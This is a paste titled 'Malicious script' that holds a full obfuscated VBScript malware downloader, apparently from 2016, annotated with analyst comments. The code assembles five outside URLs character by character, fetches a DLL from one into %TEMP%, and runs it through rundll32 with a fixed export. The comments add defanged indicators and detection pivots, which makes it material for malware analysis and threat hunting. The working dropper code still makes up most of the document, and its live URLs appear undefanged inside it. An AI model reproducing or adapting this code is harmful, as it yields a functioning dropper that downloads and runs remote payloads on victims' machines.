
Malicious script

dynamoo Oct 31st, 2016 183 Never
  1. On Error Resume Next
     ' Analyst note: from here on, runtime errors in the top-level code are suppressed instead of
     ' being reported by the script host; the main loop later checks Err.Number after the
     ' download call to decide whether to continue.
     ' Constants: Ue (2) is the iomode passed to OpenTextFile in DQs; 1/2/8 match the
     ' FileSystemObject ForReading/ForWriting/ForAppending values. WLv9 (2) is assigned to
     ' ADODB.Stream.Type (2 = adTypeText), GEw9 ("437") is the stream charset, and KYp (2) is the
     ' SaveToFile option (2 = adSaveCreateOverWrite). BQb, Kn and UEs are not referenced in the
     ' code shown.
  2. Const BQb = 1, Ue = 2, Kn = 8
  3. Const UEs = 1, WLv9 = 2, GEw9 = "437", KYp = 2
  4. Function SDu6(BVt)
     ' Analyst note: reads the file at path BVt as text through ADODB.Stream (Type = WLv9,
     ' Charset = GEw9) and returns ZBd(<file text>).
     ' ZBd is not defined anywhere in this listing and SDu6 is not called by the top-level code
     ' shown, so this looks like unused decoder scaffolding -- confirm against the full sample.
     ' Xi is declared but never used.
  5. Dim Qx4, Xi, SAx1
  6. Set Qx4 = CreateObject("ADODB.Stream")
  7. Qx4.type = WLv9
  8. Qx4.Charset = GEw9
  9. Qx4.Open
  10. Qx4.LoadFromFile BVt
  11. SAx1 = Qx4.ReadText
  12. Qx4.Close
  13. SDu6 = ZBd(SAx1)
  14. End Function
  15. Sub VKq4(BVt, Pg0)
      ' Analyst note: writes ALs(Pg0) as text to the file at path BVt through ADODB.Stream,
      ' overwriting any existing file (SaveToFile option KYp = 2).
      ' ALs is not defined in this listing and VKq4 is not called by the top-level code shown;
      ' it mirrors SDu6 (read/transform vs. transform/write) -- presumably a disabled
      ' decode-to-disk path, to be confirmed against the full sample.
  16. Dim Qx4, SAx1
  17. Set Qx4 = CreateObject("ADODB.Stream")
  18. Qx4.type = WLv9
  19. Qx4.Charset = GEw9
  20. Qx4.Open
  21. SAx1 = ALs(Pg0)
  22. Qx4.WriteText SAx1
  23. Qx4.SaveToFile BVt, KYp
  24. Qx4.Close
  25. End Sub
  26. Function Cv3(NHa0)
      ' Analyst note: helper that returns an array with NHa0 elements, used by Cl3 as a buffer
      ' for response bytes. VBScript has no direct "new array of size n" expression, so the
      ' size is produced indirectly:
      '   NHa0 <= 0 -> raises error 50001 (description is the filler string "asdfasdf")
      '   NHa0 =  1 -> returns the fixed one-element array YLy5
      '   NHa0 >  1 -> Split() of NHa0-1 spaces on " " yields NHa0 empty strings
  27. Dim SAx1, YLy5(0)
  28. If NHa0 <= 0 Then
  29. Err.Raise 50001, "", "asdfasdf", "", 0
  30. ElseIf NHa0 = 1 Then
  31. Cv3 = YLy5
  32. Else
  33. SAx1 = Space(NHa0-1)
  34. Cv3 = Split(SAx1, " ")
  35. End If
  36. End Function
  37. Function Cl3(url)
      ' Analyst note: performs a synchronous HTTP GET of url and returns the response body as
      ' an array of byte values (one element per byte, sized via Cv3).
      ' Two COM HTTP clients are tried in order: WinHttp.WinHttpRequest.5.1, then MSXML2.XMLHTTP.
      ' The HTTP status is never checked, so an error page would be returned like any other body.
      ' Cl3 is not called by the top-level code shown (DQs is used for the download instead).
      ' DRq9 is created but not used in this function.
  38. Dim DRq9, Zb9, Xi, Ox9
  39. Dim Ir7, VMo(1)
  40. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  41. VMo(0) = "WinHttp.WinHttpRequest.5.1"
  42. VMo(1) = "MSXML2.XMLHTTP"
      ' Fallback loop: keep the first ProgID that instantiates without setting Err.
      ' NOTE(review): this function has no On Error Resume Next of its own, so a failing
      ' CreateObject may abort the function instead of reaching the Err.Number test -- verify.
  43. For Each Ir7 in VMo
  44. Err.Clear
  45. Set Zb9 = CreateObject(Ir7)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
      ' Third argument False = not asynchronous; Send blocks until the response has arrived.
  50. Zb9.Open "GET", url, False
  51. Zb9.Send
  52. Xi = Cv3(LenB(Zb9.ResponseBody))
      ' Copy the body one byte at a time; MidB/AscB are 1-based, the array is 0-based.
  53. For Ox9 = 1 To LenB(Zb9.ResponseBody)
  54. Xi(Ox9-1) = AscB(MidB(Zb9.ResponseBody, Ox9, 1))
  55. Next
  56. Cl3 = Xi
  57. End Function
  58. Sub DQs( It, OJm )
      ' Analyst note: downloads URL It with a synchronous WinHttp GET and writes the response
      ' body to disk. This is the download routine the top-level loop actually calls.
      ' Target path resolution:
      '   - OJm is an existing folder      -> file name = text after the last "/" in It
      '   - parent folder of OJm exists    -> OJm itself is used as the file path
      '   - otherwise                      -> echoes an error and returns without downloading
      ' Nothing in this routine checks the HTTP status, size or content of the response;
      ' whatever the server returns is written to the target file.
  59. Dim Ox9, Yp1, DRq9, Zb9, Ah9
  60. Set DRq9 = CreateObject( "Scripting.FileSystemObject" )
  61. If DRq9.FolderExists( OJm ) Then
  62. Ah9 = DRq9.BuildPath( OJm, Mid( It, InStrRev( It, "/" ) + 1 ) )
  63. ElseIf DRq9.FolderExists( Left( OJm, InStrRev( OJm, "\" ) - 1 ) ) Then
  64. Ah9 = OJm
  65. Else
  66. WScript.Echo "ERROR: Target folder not found."
  67. Exit Sub
  68. End If
      ' Ue = 2 (write mode) with create = True: the file is created or truncated before the
      ' request is even sent, so a failed download can still leave an empty file behind.
  69. Set Yp1 = DRq9.OpenTextFile( Ah9, Ue, True )
  70. Set Zb9 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
  71. Zb9.Open "GET", It, False
  72. Zb9.Send
      ' Binary body is pushed through a text stream one byte at a time via Chr(AscB(...)).
  73. For Ox9 = 1 To LenB( Zb9.ResponseBody )
  74. Yp1.Write Chr( AscB( MidB( Zb9.ResponseBody, Ox9, 1 ) ) )
  75. Next
  76. Yp1.Close( )
  77. End Sub
  78. Function FSn7()
      ' Analyst note: returns the full path of the rundll32.exe that Ab will launch.
      ' It reads PROCESSOR_ARCHITECTURE from the System environment block; on "amd64" it picks
      ' %SystemRoot%\SysWOW64\rundll32.exe (the 32-bit binary on 64-bit Windows), otherwise
      ' %SystemRoot%\system32\rundll32.exe. Forcing the 32-bit loader suggests the downloaded
      ' DLL is a 32-bit image -- inferred, not shown on this page.
  79. Dim Lw6, Sz, ROm
  80. Set Lw6 = CreateObject("WScript.Shell")
  81. Set Sz = Lw6.Environment("System")
  82. ROm = Sz("PROCESSOR_ARCHITECTURE")
  83. If LCase(ROm) = "amd64" Then
  84. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  85. Else
  86. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  87. End If
  88. End Function
  89. Sub Ab(Bx0, Jn0, QRs5)
      ' Analyst note: executes the file at Bx0 as a DLL through rundll32.
      ' The command line has the shape "<rundll32 path> <8.3 short path of Bx0>,<Jn0> <QRs5>",
      ' where Jn0 is the export name and QRs5 a single argument string.
      ' Detection-relevant: the result is a script host process starting rundll32.exe with a
      ' DLL path and export name on its command line; the short (8.3) path form means the
      ' logged command line will not necessarily contain the long file name.
  90. Dim Lw6, DRq9, Yp1, Sd, Ib1
  91. Set Lw6 = CreateObject("WScript.Shell")
  92. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  93. Set Yp1 = DRq9.GetFile(Bx0)
  94. Sd = Yp1.ShortPath
  95. Ib1 = FSn7() + " " + Sd + "," + Jn0 + " " + QRs5
      ' "2 > 1" is always true: a junk conditional that only pads the code.
  96. If 2 > 1 Then
  97. Lw6.Run(Ib1)
  98. End If
  99. End Sub
  100. Function NMa6(Bx0)
       ' Analyst note: thin wrapper that returns FileSystemObject.FileExists(Bx0); the main
       ' loop uses it to test for the downloaded DLL and for a ".txt" marker file.
  101. Dim DRq9
  102. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  103. NMa6 = DRq9.FileExists(Bx0)
  104. End Function
  105. Function SWu0(Bx0)
       ' Analyst note: returns the 8.3 short path of the existing file Bx0 (GetFile fails if
       ' the file is absent). The main loop appends ".txt" to this value to form a marker path.
  106. Dim DRq9, Yp1
  107. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  108. Set Yp1 = DRq9.GetFile(Bx0)
  109. SWu0 = Yp1.ShortPath
  110. End Function
  111. Function TEv5(CTi, Nh0)
       ' Analyst note: floating-point remainder, CTi - Int(CTi / Nh0) * Nh0, computed in
       ' Double. Ng calls it with Nh0 = 1.0 to keep only the fractional part of a sum.
  112. Dim NHa0
  113. NHa0 = CDbl(Int(CDbl(CTi)/CDbl(Nh0)))
  114. TEv5 = CDbl(CTi) - NHa0 * CDbl(Nh0)
  115. End Function
  116. Function Ng(LCl0, SAx1)
       ' Analyst note: pseudo-random generator over a three-element state array SAx1.
       ' Each element is advanced by a multiply-and-modulo step (171/30269, 172/30307,
       ' 170/30323 -- the constants of the Wichmann-Hill generator), the three scaled values
       ' are summed, the fractional part is taken via TEv5(..., 1.0), and the function returns
       ' Int(fraction * LCl0), i.e. an integer in 0 .. LCl0-1.
       ' The new state is assigned back into SAx1. Ng is not called by the top-level code
       ' shown; the Je array defined there has three elements and may be its intended seed --
       ' unconfirmed.
  117. SAx1(1) = 172 * SAx1(1) Mod 30307
  118. SAx1(0) = 171 * SAx1(0) Mod 30269
  119. SAx1(2) = 170 * SAx1(2) Mod 30323
  120. Dim Lp3
  121. Lp3 = TEv5((CDbl(SAx1(0))/30269.0 + CDbl(SAx1(1))/30307.0 + CDbl(SAx1(2))/30323.0), 1.0)
  122. Ng = Int(Lp3 * CDbl(LCl0))
  123. End Function
  124. Function Yg0(KFe)
       ' Analyst note: returns a random integer from 0 to KFe inclusive using the built-in
       ' Rnd(). CInt rounds rather than truncates, so 0 and KFe are picked less often than the
       ' values in between. The main loop uses it to choose an index into the URL array BJy.
  125. Yg0 = CInt(KFe*Rnd())
  126. End Function
  127. Sub Jo(LQh)
       ' Analyst note: wrapper around WScript.Sleep; LQh is a delay in milliseconds.
  128. WScript.Sleep(LQh)
  129. End Sub
  130. Randomize
       ' Analyst note -- top-level flow of this downloader:
       '   1. build five download URLs and a fixed file-name stem,
       '   2. download one randomly chosen URL to %TEMP%\<stem><n>.dll,
       '   3. run the file through rundll32 with a fixed export name and argument,
       '   4. sleep and repeat for n = 0..10, exiting early if a ".txt" marker file appears.
       ' Randomize seeds Rnd(), which Yg0 uses to pick the URL. Je and AMb are assigned but not
       ' read anywhere in the code shown.
  131. Dim Je(2), AMb, BJy(4), BVt
  132. Je(0) = 1256
  133. Je(1) = 21487
  134. Je(2) = 14252
  135. AMb = 21
       ' The URLs are assembled one character at a time so the host names do not appear as
       ' contiguous strings in the file; the always-true "If 1=1" wrappers are padding.
       ' Defanged values for blocklists and proxy/DNS log searches:
       '   BJy(0) = hxxp://tastebudsmarketing[.]com/uw6lin
       '   BJy(1) = hxxp://mechap[.]com/xd7uh
       '   BJy(2) = hxxp://coffeeteashop[.]ru/daz2rp
       '   BJy(3) = hxxp://ficussalm[.]com/0bqzcn96
       '   BJy(4) = hxxp://waynesinew[.]com/0fqt9he1
  136. If 1=1 Then
  137. BJy(0) = "http://" & "t" & "a" & "s" & "t" & "e" & "b" & "u" & "d" & "s" & "m" & "a" & "r" & "k" & "e" & "t" & "i" & "n" & "g" & "." & "c" & "o" & "m" & "/" & "u" & "w" & "6" & "l" & "i" & "n"
  138. End If
  139. If 1=1 Then
  140. BJy(1) = "http://" & "m" & "e" & "c" & "h" & "a" & "p" & "." & "c" & "o" & "m" & "/" & "x" & "d" & "7" & "u" & "h"
  141. End If
  142. If 1=1 Then
  143. BJy(2) = "http://" & "c" & "o" & "f" & "f" & "e" & "e" & "t" & "e" & "a" & "s" & "h" & "o" & "p" & "." & "r" & "u" & "/" & "d" & "a" & "z" & "2" & "r" & "p"
  144. End If
  145. If 1=1 Then
  146. BJy(3) = "http://" & "f" & "i" & "c" & "u" & "s" & "s" & "a" & "l" & "m" & "." & "c" & "o" & "m" & "/" & "0" & "b" & "q" & "z" & "c" & "n" & "9" & "6"
  147. End If
  148. If 1=1 Then
  149. BJy(4) = "http://" & "w" & "a" & "y" & "n" & "e" & "s" & "i" & "n" & "e" & "w" & "." & "c" & "o" & "m" & "/" & "0" & "f" & "q" & "t" & "9" & "h" & "e" & "1"
  150. End If
       ' File-name stem of the dropped DLL; the full path becomes %TEMP%\Tqg8ceGBV4iU4AM2<n>.dll.
  151. BVt = "Tqg8ceGBV4iU4AM2"
  152. Dim Lw6, Nj, Zj, Sg5, LQh
       ' "WScript.Shell" and "%TEMP%" are split across concatenations, again to avoid plain
       ' strings. objShell is used without a Dim (no Option Explicit); Lw6 stays unused here.
  153. Set objShell = CreateObject("WS"&"cript.Shell")
  154. Nj = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
  155. Dim ODc, FOl8, JPf0, Wn9, Ox9
       ' FOl8 = "a download has already succeeded"; it limits the script to one download.
  156. FOl8 = False
       ' "Do ... Loop While False" runs its body exactly once per For iteration; it exists so
       ' that "Exit Do" can act as a "continue to the next Ox9".
  157. For Ox9=0 To 10: Do
  158. Zj = Nj + "\" + BVt + CStr(Ox9) + ".dll"
       ' Stop condition: if this pass's DLL exists and "<its short path>.txt" exists as well,
       ' the script exits with code 0. Nothing in this script creates that .txt file;
       ' presumably the DLL writes it once it is running -- confirm by analysing the payload.
  159. If NMa6(Zj) Then
  160. Sg5 = SWu0(Zj) & ".txt"
  161. If NMa6(Sg5) Then
  162. WScript.Quit(0)
  163. End If
  164. End If
       ' Download step: pick a random index 0..UBound(BJy) and fetch that URL to Zj. A non-zero
       ' Err.Number after the call skips the rest of this pass, so the next pass retries with
       ' the next file index and a freshly drawn URL.
  165. If Not FOl8 Then
  166. ODc = Yg0(UBound(BJy))
  167. DQs BJy(ODc), Zj
  168. If Err.Number <> 0 Then
  169. Exit Do
  170. End If
  171. FOl8 = True
  172. End If
       ' Execution step: rundll32 <Zj short path>,EnhancedStoragePasswordConfig 147.
       ' Zj is recomputed with the current index on every pass while the download happens only
       ' once, so later passes point at file names this script did not itself download.
       ' Hunting pivots visible here: the export name "EnhancedStoragePasswordConfig", the
       ' argument "147", and a .dll under %TEMP% named with the stem above.
  173. Ab Zj, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47"
       ' Fixed delay of 24700 ms between passes.
  174. LQh = 24700
  175. Jo LQh
  176. Loop While False: Next
       ' Reached only if no pass found the marker file; "3=3" is always true, exit code 1.
  177. If 3=3 Then
  178. WScript.Quit(1)
  179. End If